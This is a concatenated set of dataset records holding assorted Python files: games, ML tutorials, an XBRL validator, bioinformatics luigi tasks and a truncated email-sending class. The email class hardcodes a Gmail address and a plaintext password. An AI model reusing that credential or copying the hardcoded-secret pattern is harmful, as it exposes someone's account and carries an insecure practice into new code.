+{"seq_id":"482914766","text":"import pygame, os, random, string\n\n# Import helper functions.\n#from helpers import top_draggable_sprite_at_point, aspect_scale, draw_rects\n#from screen_helpers import quit_game, switch_to_screen, notify\n\n# Import sprites.\nfrom sprites.base_sprites import ImageSprite, ButtonSprite, InputBox, button_at_point, TextSprite\n\ndef quit_game(game_state):\n game_state.update({'quit': True})\n game_state.update({'screen_done': True})\n return game_state\n\ndef start_game(game_state):\n game_state.update({'active_screen': 'arena_screen'})\n game_state.update({'screen_done': True})\n return game_state\n\n\ndef main_menu_loop(game_state):\n \"\"\"The main menu screen loop.\n \"\"\"\n\n game_surface = game_state.get('game_surface')\n clock = game_state.get('clock')\n fps = game_state.get('fps')\n screen_size = game_state.get('screen_size')\n screen_width = screen_size[0]\n screen_height = screen_size[1]\n framecount = 1\n\n #toast_stack = game_state.get('toast_stack')\n logo_sprites = pygame.sprite.OrderedUpdates()\n logo = ImageSprite(\n screen_width*0.315,\n screen_height*0.15,\n os.getcwd() +\"/images/Tank.png\"\n )\n logo.rect.centerx = (screen_width/2)\n logo_sprites.add(logo)\n\n # company_name = game_state.get('company_name')\n # input_font = pygame.font.Font(\"ARCADECLASSIC.TTF\", 40)\n # input_width, input_height = 0.1* screen_width, 0.0625*screen_height\n\n # company_name_input = InputBox(\n # (0.5*screen_width) - (0.5*input_width),\n # 0.68*screen_height,\n # input_width + 10,\n # input_height + 10,\n # input_font,\n # (0, 0, 255),\n # (255, 255, 0),\n # 
center_x=0.5*screen_width,\n # text=company_name,\n # max_width=500\n # )\n # company_name_input.active = True\n\n # Main group of sprites to display.\n all_sprites = pygame.sprite.OrderedUpdates()\n all_sprites.add(\n ButtonSprite(\n (screen_width * 0.455),\n (screen_height * 0.8),\n 'Play!',\n start_game,\n []),\n ButtonSprite(\n (screen_width * 0.455),\n (screen_height * 0.9),\n 'Quit',\n quit_game,\n [],\n ),\n )\n\n # prompt = TextSprite((0.43*screen_width) , 0.62 *screen_height, 400, 30, \"Enter Company Name\", text_color=(255,255,255), arcade_font=True)\n # prompt.rect.centerx = (screen_width/2)\n # name_prompt = pygame.sprite.Group()\n # name_prompt.add(prompt)\n # this poo could be important!\n\n # Want to refactor this body into seperate functions.\n while not game_state.get('screen_done'):\n\n # Handle events.\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n quit_game(game_state)\n\n elif event.type == pygame.MOUSEBUTTONDOWN:\n b = button_at_point(all_sprites, event.pos)\n if b:\n game_state = b.on_click(game_state)\n\n # elif event.type == pygame.KEYDOWN:\n # if event.key == pygame.K_RETURN:\n # game_state.update({'company_name': company_name_input.text})\n # start_game(game_state)\n # else:\n # company_name_input.event_handle(event) #Input Box Class has inbuilt event handling function for key down events.\n\n # Update.\n all_sprites.update()\n #toast_stack.update()\n\n # Display.\n game_surface.fill((0, 0, 0))\n logo_sprites.draw(game_surface)\n all_sprites.draw(game_surface)\n\n\n pygame.display.update()\n\n clock.tick(fps)\n\n return game_state\n","sub_path":"main_menu_screen.py","file_name":"main_menu_screen.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"176066171","text":"up# Hierarchical Clusturing\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# importing the mall dataset with pandas\ndataset = pd.read_csv('/Users/quentin/Documents/AI/UDEMY_ML/Machine Learning A-Z Template Folder/Part 4 - Clustering/Section 25 - Hierarchical Clustering/Mall_Customers.csv')\nX = dataset.iloc[:, [3,4]].values\n\n# Using the dendrogram to find the optimal number of clusters\nimport scipy.cluster.hierarchy as sch\ndendrogram = sch.dendrogram(sch.linkage(X, method = 'ward'))\nplt.title('dendrogram')\nplt.xlabel('Customers')\nplt.ylabel('Euclidean Distances')\nplt.show()\n\n'''\nHere again, the good number of clusers is 5\n'''\n\n# Fitting hierarchical clustering to the mall dataset\nfrom sklearn.cluster import AgglomerativeClustering\nhc = AgglomerativeClustering(n_clusters = 5, affinity = 'euclidean', linkage = 'ward')\ny_hc = hc.fit_predict(X)\n\n# Visualising the clusters\n# Plotting the clustured dataset (using boollean tricks)\nplt.scatter(X[y_hc == 0,0], X[y_hc == 0,1], s = 100, c = 'red', label = 'Careful')\nplt.scatter(X[y_hc == 1,0], X[y_hc == 1,1], s = 100, c = 'blue', label = 'Standard')\nplt.scatter(X[y_hc == 2,0], X[y_hc == 2,1], s = 100, c = 'green', label = 'Target')\nplt.scatter(X[y_hc == 3,0], X[y_hc == 3,1], s = 100, c = 'cyan', label = 'Careless')\nplt.scatter(X[y_hc == 4,0], X[y_hc == 4,1], s = 100, c = 'magenta', label = 'Sensible')\nplt.title('clusters of clients')\nplt.ylabel('Spending Score')\nplt.xlabel('Annual Income')\nplt.legend()\nplt.show()\n\n\n\n","sub_path":"Machine Learning A-Z/Part 4 - Clustering/Section 25 - Hierarchical 
Clustering/SECTION_25_PART_4.py","file_name":"SECTION_25_PART_4.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"231690972","text":"# Copyright 2015 Altova GmbH\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n#\t http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n__copyright__ = 'Copyright 2015 Altova GmbH'\n__license__ = 'http://www.apache.org/licenses/LICENSE-2.0'\n\n# Validates all SEC filings in the given RSS feed\n#\n# Usage:\n# \traptorxmlxbrl script scripts/validate_filings.py feeds/xbrlrss-2015-04.xml\n\nimport altova_api.v2.xml as xml\nimport altova_api.v2.xsd as xsd\nimport altova_api.v2.xbrl as xbrl\nimport re,sys,os.path,time,concurrent.futures,urllib,glob,logging,argparse\n\ngsRootDir = os.sep.join(os.path.abspath(__file__).split(os.sep)[:-2])\ngsRootURL = 'file://'+urllib.request.pathname2url(gsRootDir)+'/'\n\ndef load_rss_schema():\n\trss_schema, log = xsd.Schema.create_from_url(urllib.parse.urljoin(gsRootURL,'xsd/rss.xsd'))\n\tif not rss_schema:\n\t\traise Exception('\\n'.join([error.text for error in log]))\n\treturn rss_schema\n\t\ndef load_rss_feed(url,schema):\n\trss_feed, log = xml.Instance.create_from_url(urllib.parse.urljoin(gsRootURL,url),schema=schema)\n\tif not rss_feed:\n\t\traise Exception('\\n'.join([error.text for error in log]))\n\treturn rss_feed\n\ndef child_as_str(elem,name):\n\tchild = elem.find_child_element((name,'http://www.sec.gov/Archives/edgar'))\n\tif child:\n\t\treturn str(child.schema_actual_value)\n\treturn None\n\ndef child_as_int(elem,name):\n\tchild = elem.find_child_element((name,'http://www.sec.gov/Archives/edgar'))\n\tif child:\n\t\treturn int(child.schema_actual_value)\n\treturn None\n\t\ndef parse_rss_feed(rss_feed,args):\n\tdir = 'filings/'+re.fullmatch(r'file:///.*/xbrlrss-(\\d{4}-\\d{2})\\.xml',rss_feed.uri).group(1)\n\n\tfilings = []\n\trss = rss_feed.document_element\n\tfor channel in rss.element_children():\n\t\tfor item in channel.element_children():\n\t\t\tif item.local_name == 'item':\n\t\t\t\txbrlFiling = item.find_child_element(('xbrlFiling','http://www.sec.gov/Archives/edgar'))\n\t\t\t\tif xbrlFiling:\n\t\t\t\t\tif args.company_re and not bool(args.company_re.match(child_as_str(xbrlFiling,'companyName'))):\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif args.form_type and args.form_type != child_as_str(xbrlFiling,'formType'):\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif args.cik and args.cik != child_as_int(xbrlFiling,'cikNumber'):\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif args.sic and args.sic != child_as_int(xbrlFiling,'assignedSic'):\n\t\t\t\t\t\tcontinue\n\t\t\t\t\n\t\t\t\t\taccessionNumber = xbrlFiling.find_child_element(('accessionNumber','http://www.sec.gov/Archives/edgar')).schema_normalized_value\n\t\t\t\t\txbrlFiles = xbrlFiling.find_child_element(('xbrlFiles','http://www.sec.gov/Archives/edgar'))\n\t\t\t\t\tfor xbrlFile in xbrlFiles.element_children():\n\t\t\t\t\t\tif xbrlFile.find_attribute(('type','http://www.sec.gov/Archives/edgar')).schema_normalized_value == 
'EX-101.INS':\n\t\t\t\t\t\t\turl = xbrlFile.find_attribute(('url','http://www.sec.gov/Archives/edgar')).schema_normalized_value\n\t\t\t\t\t\t\tfilings.append(dir+'/'+accessionNumber+'-xbrl.zip%7Czip/'+url.split('/')[-1])\n\treturn filings\n\ndef validate(url):\n\tinstance, log = xbrl.Instance.create_from_url(urllib.parse.urljoin(gsRootURL,url))\n\tif not instance or log.has_errors():\t\t\n\t\terrors = list(log.errors)\n\t\tlogger.error('Filing %s has %d ERRORS!',url,len(errors))\n\t\tif logging.getLogger().isEnabledFor(logging.DEBUG):\n\t\t\tlogger.log(logging.DEBUG,'\\n'.join([error.text for error in log]))\n\t\treturn False\n\tif log.has_inconsistencies():\n\t\tinconsistencies = list(log.inconsistencies)\n\t\tlogger.warning('Filing %s has %d INCONSISTENCIES!',url,len(inconsistencies))\n\t\tif logging.getLogger().isEnabledFor(logging.DEBUG):\n\t\t\tlogger.log(logging.DEBUG,'\\n'.join([error.text for error in inconsistencies]))\n\telse:\n\t\tlogger.info('Filing %s is VALID!',url)\n\treturn True\n\t\ndef parse_args():\n\t\"\"\"Returns the arguments and options passed to the script.\"\"\"\n\tparser = argparse.ArgumentParser(description='Validates all filings contained in the given EDGAR RSS feed from the SEC archive.')\n\tparser.add_argument('rss_feeds', metavar='RSS', nargs='+', help='EDGAR RSS feed file')\n\tparser.add_argument('--log', metavar='LOGFILE', dest='log_file', help='specify output log file')\n\tparser.add_argument('--log-level', type=int, default=logging.INFO, help='specify min. log level (use 10 to enable detailed error messages)')\n\tparser.add_argument('--cik', help='CIK number')\n\tparser.add_argument('--sic', help='SIC number')\n\tparser.add_argument('--form-type', help='Form type (10-K,10-Q,...)')\n\tparser.add_argument('--company', help='Company name')\n\tparser.add_argument('--threads', type=int, default=8, dest='max_threads', help='specify max number of threads')\n\targs = parser.parse_args()\n\targs.company_re = re.compile(args.company, re.I) if args.company else None\n\tif args.cik:\n\t\targs.cik = int(args.cik)\n\tif args.sic:\n\t\targs.sic = int(args.sic)\n\treturn args\n\t\ndef setup_logging(args):\n\t\"\"\"Setup the Python logging infrastructure.\"\"\"\n\tglobal logger\n\tif args.log_file:\n\t\tlogging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',filename=args.log_file,filemode='w',level=args.log_level)\n\telse:\n\t\tlogging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',level=args.log_level)\n\tlogger = logging.getLogger('default')\n\t\ndef main():\n\t# Parse script arguments\n\targs = parse_args()\t\n\t# Setup python logging framework\n\tsetup_logging(args)\n\n\trss_schema = load_rss_schema()\n\tfor arg in sys.argv[1:]:\n\t\tfor file in glob.glob(arg):\n\t\t\tlogger.info('Loading rss file %s',file)\n\t\t\trss_feed = load_rss_feed(urllib.request.pathname2url(file),rss_schema)\n\t\t\tfilings = parse_rss_feed(rss_feed,args)\n\t\t\t\n\t\t\tlogger.info('Processing %d filings...',len(filings))\n\t\t\twith concurrent.futures.ThreadPoolExecutor(max_workers=args.max_threads) as executor:\n\t\t\t\tfutures = [executor.submit(validate,url) for url in filings]\n\t\t\t\tfor future in concurrent.futures.as_completed(futures):\n\t\t\t\t\tfuture.result()\n\nif __name__ == '__main__':\n\tstart = time.clock()\n\tmain()\n\tend = time.clock()\n\tprint('Finished in 
',end-start)","sub_path":"scripts/validate_filings.py","file_name":"validate_filings.py","file_ext":"py","file_size_in_byte":6266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"198353090","text":"\"\"\"\nscript to create phenotype comparison tables for genome protein expression profiles, and metadata files accompaniying them.\nThese tables will be used as inputs for the DESeq package in R for differential genome analysis and extracting meaningfull\ndifferentially expressed genomes from samples.\n\"\"\"\n\nimport pandas as pd\nimport json\nimport os\n\nphenotype_pairs_f = '/data/mstambou/proteome_landscapes/highly_abundant_genomes/comparisonLists.txt'\nsamplesSubsamples2phenotypes_dic_f = '/data/mstambou/proteome_landscapes/highly_abundant_genomes/samplesSubSamples2phenotypes_dic.json'\nallBin2taxon_dic_f = '/data/mstambou/proteome_landscapes/auxilary/allBin2taxon_dic.json'\n\nsamples_summary_f = '/data/mstambou/proteome_landscapes/highly_abundant_genomes/samples_1_genomes_1000_peps_withPhenotypes.tsv'\ngenome_abundance_dir = '/data/mstambou/proteome_landscapes/highly_abundant_genomes/genome_spectralCount/'\n\nout_dir = '/data/mstambou/proteome_landscapes/highly_abundant_genomes/phenotype_taxa_relNorm_profiles_scaled/'\n\ntax_level = 's'\n\n\nif not os.path.isdir(out_dir):\n os.mkdir(out_dir)\n\nwith open(samplesSubsamples2phenotypes_dic_f, 'r') as in_f:\n samplesSubsamples2phenotypes_dic = json.load(in_f)\n \nsamples_summary_df = pd.read_csv(samples_summary_f, sep = '\\t')\n\nwith open(allBin2taxon_dic_f, 'r') as in_f:\n allBin2taxon_dic = json.load(in_f)\n\ndef getMST(genome, allBin2taxon_dic = allBin2taxon_dic, l = tax_level):\n if allBin2taxon_dic[genome][l] != '':\n return l + '__' + allBin2taxon_dic[genome][l]\n else:\n for c in 'sgfocpd':\n taxon = allBin2taxon_dic[genome][c]\n if taxon != '' and taxon != 'GCF_' and taxon != 'GCA_':\n return c+'__'+taxon\n\nscale = 1000\n\nwith open(phenotype_pairs_f, 'r') as in_f:\n for line in in_f:\n line = line.strip().split('\\t')\n phen1, phen2 = line[0], line[1]\n print(f'processing {phen1} vs {phen2} ...')\n phen1_samples = samplesSubsamples2phenotypes_dic[phen1]\n phen1_df = samples_summary_df[samples_summary_df['sample_name'].isin(phen1_samples)]\n pair_genomes = [item for sublist in list(phen1_df['expanded_genomes']) for item in sublist.split('|')]\n phen2_samples = samplesSubsamples2phenotypes_dic[phen2]\n phen2_df = samples_summary_df[samples_summary_df['sample_name'].isin(phen2_samples)]\n pair_genomes.extend([item for sublist in list(phen2_df['expanded_genomes']) for item in sublist.split('|')])\n \n pair_genomes = list(set(pair_genomes))\n pair_taxa = list(set([getMST(genome) for genome in pair_genomes]))\n \n taxa2idx_dic = {taxa:i for i, taxa in enumerate(pair_taxa)}\n pair_df = pd.DataFrame()\n pair_df['taxa'] = pair_taxa\n pair_metadata_df = pd.DataFrame(columns = ['sample_ID', 'phenotype'])\n \n for sample in phen1_samples:\n sample_df = pd.read_csv(f'{genome_abundance_dir + sample}_genome2NspectraNormalized.tsv', sep = '\\t')\n sample_vec = [1]*len(pair_taxa)\n pair_metadata_df.loc[len(pair_metadata_df)] = [sample, phen1]\n for i, row in sample_df.iterrows():\n genome_id, n_spectra = row['genome'], row['rel_n_spectra_%_normalized']\n taxa_id = getMST(genome_id)\n n_spectra = int(round(n_spectra*scale))\n sample_vec[taxa2idx_dic[taxa_id]] = n_spectra \n pair_df[sample] = sample_vec\n \n for sample in phen2_samples:\n sample_df = pd.read_csv(f'{genome_abundance_dir + 
sample}_genome2NspectraNormalized.tsv', sep = '\\t')\n sample_vec = [1]*len(pair_taxa)\n pair_metadata_df.loc[len(pair_metadata_df)] = [sample, phen2]\n for i, row in sample_df.iterrows():\n genome_id, n_spectra = row['genome'], row['rel_n_spectra_%_normalized']\n taxa_id = getMST(genome_id)\n n_spectra = int(round(n_spectra*scale))\n sample_vec[taxa2idx_dic[taxa_id]] = n_spectra \n pair_df[sample] = sample_vec\n \n pair_df.to_csv(out_dir + phen1 + '_vs_' + phen2 + f'_{tax_level}_taxaProfiles.tsv', sep = '\\t', index = False)\n pair_metadata_df.to_csv(out_dir + phen1 + '_vs_' + phen2 + '_metadata.tsv', sep = '\\t', index = False)\n \n","sub_path":"proteinAbundance/get_relNormScaled_taxProfileTables.py","file_name":"get_relNormScaled_taxProfileTables.py","file_ext":"py","file_size_in_byte":4343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"597492205","text":"\ndef secondMax(max1, max2):\n if max2 > max1:\n max1, max2 = max2, max1\n while True:\n cislo = int(input())\n if cislo == -1:\n break\n elif cislo > max1:\n max2 = max1\n max1 = cislo\n elif max2 < cislo < max1:\n max2 = cislo\n return max2\n\na = int(input())\nb = int(input())\n\nresult = secondMax(a, b)\nprint(result)\n\n","sub_path":"secondmax.py","file_name":"secondmax.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"227553530","text":"from pathlib import Path\n\nfrom pytest import fixture\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import make_scorer, mean_squared_error, r2_score\nfrom sklearn.model_selection import RepeatedKFold\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import RobustScaler\n\nfrom coltrane import Batch\nfrom coltrane.file.io.csv.single import Data\nfrom coltrane.regression import Inspector, Processor\n\n__LOG = Path('log')\n__DATA_HOUSING = Path('coltrane/test/data/housing.csv')\n\n__RANDOM_STATE = 45625461\n\n\n@fixture(scope='function')\ndef data() -> Data:\n return Data(path=__DATA_HOUSING)\n\n\n@fixture(scope='function')\ndef batch(data: Data, random_state: int) -> Batch:\n\n return Batch(\n data,\n pipeline=Pipeline(\n steps=[\n ('robust-scaler', RobustScaler()),\n ('linear', LinearRegression())\n ]\n ),\n selection=RepeatedKFold(\n n_splits=5,\n n_repeats=1,\n random_state=__RANDOM_STATE\n ),\n scorers={\n 'r2': make_scorer(r2_score),\n 'mse': make_scorer(mean_squared_error)\n }\n )\n\n\ndef test_inspection(data: Data):\n inspector = Inspector()\n inspector.inspect(data, output=__LOG)\n\n\ndef test_regression(batch: Batch):\n processor = Processor()\n processor.process(batch, output=__LOG)\n","sub_path":"coltrane/test/test_housing.py","file_name":"test_housing.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"646358674","text":"\nperm_dic= {\n #'crm_table_index': ['table_index', 'GET', [], {'source':'qq'}, ], # 可以查看audit APP里所有数据库表\n 'audit_table_list': ['table_detail', 'GET', [], {}], # 可以查看每张表里所有的数据\n 'audit_table_list_view': ['table_change', 'GET', [], {}], # 可以访问表里每条数据的修改页\n 'audit_table_list_change': ['table_change', 'POST', [], {}], # 可以对表里的每条数据进行修改\n 'audit_table_obj_add_view': ['table_add', 'GET', [], {}], # 可以访问数据增加页\n 'audit_table_obj_add': ['table_add', 'POST', [], {}], # 
可以创建表里的数据\n\n}\n\n\n\n","sub_path":"hotel/permission_list.py","file_name":"permission_list.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"577894740","text":"#!/usr/bin/env python3\n\n\"\"\"Problem 102: Triangle containment\"\"\"\n\nfrom utils import get_path\n\n\ndef main():\n cnt = 0\n\n with get_path(\"data\", \"triangles.txt\").open() as data_file:\n for line in data_file:\n x1, y1, x2, y2, x3, y3 = map(int, line.split(\",\"))\n\n # if z-components of cross products OA x OB, OB x OC, OC x OA are\n # all of the same sign, the origin is within the triangle.\n\n if (x1*y2 - y1*x2 > 0) is (x2*y3 - y2*x3 > 0) is (x3*y1 - y3*x1 > 0):\n cnt += 1\n return cnt\n\n\nif __name__ == \"__main__\":\n print(main())\n","sub_path":"python/p102.py","file_name":"p102.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"557286826","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# pylint: disable=no-member\n# core\nfrom datetime import datetime\nimport hashlib\nimport logging\nimport json\nfrom pathlib import Path\nimport shutil\nimport subprocess\nimport time\n\n# pip\nimport requests # noqa\nimport luigi # noqa\nfrom luigi.util import requires # noqa\n\n# local\nimport bio3dbeacon\nfrom .database import get_db\nfrom .database.models import ModelStructure\nfrom .qmean import QmeanRunner\n\nLOG = logging.getLogger(__name__)\n\n# this is used to generate the UID for all entries\n# if you change this then all database entries need\n# to be recalculated (which might be what you want)\nDATA_MODEL_VERSION = '1'\n\n\ndef get_uid_from_file(model_file):\n \"\"\"\n Generates a unique id (MD5) based on the file contents (and `DATA_MODEL_VERSION`)\n \"\"\"\n model_path = Path(model_file).resolve()\n model_contents = open(model_path, 'r').read()\n m = hashlib.sha256()\n m.update(model_contents.encode('utf-8'))\n m.update(DATA_MODEL_VERSION.encode('utf-8'))\n uid = m.hexdigest()\n return uid\n\n\ndef get_file_path(*, basedir, uid, suffix):\n \"\"\"\n Generates a standardised internal file path\n \"\"\"\n uid = str(uid)\n return Path(basedir) / uid[:2] / str(uid + suffix)\n\n\nclass WithAppMixin:\n\n @property\n def app(self):\n if not hasattr(self, '_app'):\n LOG.debug(\"Creating app for luigi task %s ...\",\n self.__class__.__name__)\n self._app = bio3dbeacon.app.create_app()\n return self._app\n\n\nclass BaseTask(WithAppMixin, luigi.Task):\n \"\"\"\n Base class for all Luigi tasks\n \"\"\"\n\n\nclass BaseWrapperTask(WithAppMixin, luigi.WrapperTask):\n \"\"\"\n Base class for all Luigi Wrapper tasks\n \"\"\"\n\n\nclass IngestModelPdb(BaseTask):\n \"\"\"\n Makes sure we have a PDB file for the model structure\n\n Params:\n pdb_file: PDB file\n uid: unique ID\n\n Output:\n /path/to/model.pdb\n\n \"\"\"\n\n pdb_file = luigi.Parameter()\n uid = luigi.Parameter()\n\n def output(self):\n uid = str(self.uid)\n outfile = get_file_path(\n basedir=self.app.config['WORK_DIR'], uid=uid, suffix='.pdb')\n target = luigi.LocalTarget(outfile)\n target.makedirs()\n return target\n\n def run(self):\n\n uid = str(self.uid)\n pdb_path = Path(self.pdb_file).resolve()\n app = self.app\n\n with app.app_context():\n entry = ModelStructure.query.filter(uid=uid).one()\n\n dt_now = datetime.utcnow()\n if not entry:\n msg = f\"failed to find entry with id '{uid}' in database\"\n raise ValueError(msg)\n\n entry.update({\n 'updated_at': 
dt_now,\n 'original_path': str(pdb_path),\n })\n shutil.copyfile(pdb_path, self.output().path)\n db = get_db()\n LOG.info(\"Adding PDB entry %s to DB %s\", entry, db)\n db.session.add(entry)\n db.session.commit()\n\n\n@requires(IngestModelPdb)\nclass CalculateQmean(BaseTask):\n \"\"\"\n Calculates the QMEAN score for the given PDB file\n\n Params:\n pdb_file: PDB file\n uid: unique ID\n run_remotely: whether to run via API or local docker (default: False)\n\n Input: \n model.pdb\n\n Output: \n model_qmean.json\n\n \"\"\"\n\n run_remotely = luigi.BoolParameter(default=True)\n\n def output(self):\n pdb_file = self.input()\n if not pdb_file.path.endswith('.pdb'):\n raise ValueError(\n f\"expected pdb_file '{pdb_file}' to end with '.pdb'\")\n json_file = pdb_file.path.replace('.pdb', '_qmean.json')\n return luigi.LocalTarget(json_file)\n\n def run(self):\n\n app = self.app\n uid = str(self.uid)\n pdb_file = Path(self.pdb_file).resolve()\n qmean_output_file = self.output()\n\n runner = QmeanRunner(app=app, pdb_file=pdb_file)\n\n if self.run_remotely:\n results = runner.run_remote()\n else:\n results = runner.run_local()\n\n dt_now = datetime.utcnow()\n\n with app.app_context():\n db = get_db()\n\n entry = ModelStructure.query.get(uid)\n if not entry:\n raise ValueError(\n f\"failed to find model_structure '{uid}' in database\")\n\n entry.updated_at = dt_now\n entry.qmean_created_at = dt_now\n db.session.add(entry)\n\n LOG.info(\"Writing output JSON score data to: '%s'\",\n qmean_output_file)\n\n with qmean_output_file.open('w') as fp:\n json.dump(results, fp, indent=2, sort_keys=True)\n\n LOG.info(\"Committing changes\")\n\n db.session.commit()\n\n\n@requires(IngestModelPdb)\nclass ConvertPdbToMmcif(BaseTask):\n \"\"\"\n Converts model PDB to mmCIF file\n\n Params:\n pdb_file: PDB file\n uid: unique ID\n\n Input:\n model.pdb\n\n Output:\n model.mmcif\n \"\"\"\n\n def output(self):\n pdb_file = self.input()\n if not pdb_file.path.endswith('.pdb'):\n raise ValueError(\n f\"expected pdb_file '{pdb_file}' to end with '.pdb'\")\n mmcif_file = pdb_file.path.replace('.pdb', '.mmcif')\n return luigi.LocalTarget(mmcif_file)\n\n def run(self):\n pdb_file = self.input()\n mmcif_atomic_file = self.output()\n with mmcif_atomic_file.temporary_path() as temp_output_path:\n LOG.info(\"convert PDB to mmCIF: %s -> %s\",\n pdb_file.path, temp_output_path)\n self.convert_pdb_to_mmcif(pdb_file.path, temp_output_path)\n LOG.info(\"updating DB\")\n self.update_db()\n LOG.info(\"done\")\n\n def convert_pdb_to_mmcif(self, pdb_path, mmcif_path):\n \"\"\"Converts PDB to mmCIF file\"\"\"\n\n # gemmi_exe = self.app.config['GEMMI_EXE']\n # cmd_args = ['', 'convert', '--to', 'mmcif', pdb_path, mmcif_path]\n\n cmd_args = ['pdb_tocif', pdb_path]\n try:\n with open(mmcif_path, \"wt\") as outfile:\n subprocess.run(cmd_args, check=True, encoding='utf-8',\n stderr=subprocess.PIPE, stdout=outfile)\n except subprocess.CalledProcessError as err:\n LOG.error(\"failed to convert pdb to mmcif: %s\", err)\n LOG.error(\"CMD: %s\", \" \".join(cmd_args))\n LOG.error(\"ERROR: %s\", err)\n LOG.error(\"STDERR: %s\", err.stderr)\n LOG.error(\"STDOUT: %s\", err.stdout)\n raise\n\n def update_db(self):\n \"\"\"Updates the database\"\"\"\n app = self.app\n\n dt_now = datetime.utcnow()\n with app.app_context():\n db = get_db()\n entry = ModelStructure.query.get(self.uid)\n if not entry:\n raise ValueError(\n f\"failed to find model_structure '{self.uid}' in database\")\n\n entry.updated_at = dt_now\n entry.mmcif_created_at = dt_now\n 
db.session.add(entry)\n\n LOG.info(\"Moving mmCIF file to: '%s'\", self.output())\n db.session.commit()\n\n\n@requires(ConvertPdbToMmcif)\nclass ConvertMmcifToBcif(BaseTask):\n \"\"\"\n Convert mmCIF file to bCIF (molstar)\n\n Params:\n pdb_file: PDB file\n uid: unique ID\n\n Input:\n model.mmcif\n\n Output:\n model.bcif\n \"\"\"\n\n def output(self):\n mmcif_file = self.input()\n if not mmcif_file.path.endswith('.mmcif'):\n raise ValueError(\n f\"expected mmcif file '{mmcif_file}' to end with '.mmcif'\")\n bcif_file = mmcif_file.path.replace('.mmcif', '.bcif')\n return luigi.LocalTarget(bcif_file)\n\n def run(self):\n mmcif_file = self.input()\n bcif_file = self.output()\n molstar_exe = self.app.config['MOLSTAR_PREPROCESS_EXE']\n cmd_args = ['node', str(molstar_exe),\n '-i', str(mmcif_file.path),\n '-ob', str(bcif_file.path)]\n try:\n subprocess.run(cmd_args, check=True, encoding='utf-8',\n stderr=subprocess.PIPE, stdout=subprocess.PIPE)\n except subprocess.CalledProcessError as err:\n LOG.error(\"failed to convert mmcif to bcif: %s\", err)\n LOG.error(\"CMD: %s\", \" \".join(cmd_args))\n LOG.error(\"ERROR: %s\", err)\n LOG.error(\"STDERR: %s\", err.stderr)\n LOG.error(\"STDOUT: %s\", err.stdout)\n raise\n\n\nclass ProcessModelPdb(BaseWrapperTask):\n \"\"\"\n Generate all related files for a given model PDB file\n\n Params:\n pdb_file: input PDB file\n \"\"\"\n\n pdb_file = luigi.Parameter()\n\n def requires(self):\n uid = str(self.uid)\n pdb_file = self.pdb_file\n uid = self.get_uid()\n LOG.info(\"ProcessModelPdb: calculate qmean (local)\")\n yield(CalculateQmean(pdb_file=pdb_file, uid=uid))\n LOG.info(\"ProcessModelPdb: convert pdb to mmcif\")\n yield(ConvertPdbToMmcif(pdb_file=pdb_file, uid=uid))\n # LOG.info(\"ProcessModelPdb: add mmcif to molstar\")\n # yield(ConvertMmcifToBcif(pdb_file=pdb_file, uid=uid))\n\n def get_uid(self):\n if not hasattr(self, '_uid'):\n self._uid = None\n\n if self._uid is None:\n self._uid = get_uid_from_file(self.pdb_file)\n\n return self._uid\n","sub_path":"bio3dbeacon/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":9349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"568113218","text":"\r\nimport sys\r\nimport ast\r\nfrom datetime import datetime\r\n \r\nimport smtplib\r\nimport mimetypes\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email import encoders\r\nfrom email.message import Message\r\nfrom email.mime.audio import MIMEAudio\r\nfrom email.mime.base import MIMEBase\r\nfrom email.mime.image import MIMEImage\r\nfrom email.mime.text import MIMEText\r\n \r\n \r\n \r\nclass Bimail:\r\n\tdef __init__(self,subject,recipients):\r\n\t\tself.subject = subject\r\n\t\tself.recipients = recipients\r\n\t\tself.htmlbody = ''\r\n\t\tself.sender = \"barbxsingh@gmail.com\"\r\n\t\tself.senderpass = 'mymail23account'\r\n\t\tself.attachments = []\r\n \r\n\tdef send(self):\r\n\t\tmsg = MIMEMultipart('alternative')\r\n\t\tmsg['From']=self.sender\r\n\t\tmsg['Subject']=self.subject\r\n\t\tmsg['To'] = \", \".join(self.recipients) # to must be array of the form ['mailsender135@gmail.com']\r\n\t\tmsg.preamble = \"preamble goes here\"\r\n\t\t#check if there are attachments if yes, add them\r\n\t\tif self.attachments:\r\n\t\t\tself.attach(msg)\r\n\t\t#add html body after attachments\r\n\t\tmsg.attach(MIMEText(self.htmlbody, 'html'))\r\n\t\t#send\r\n\t\ts = 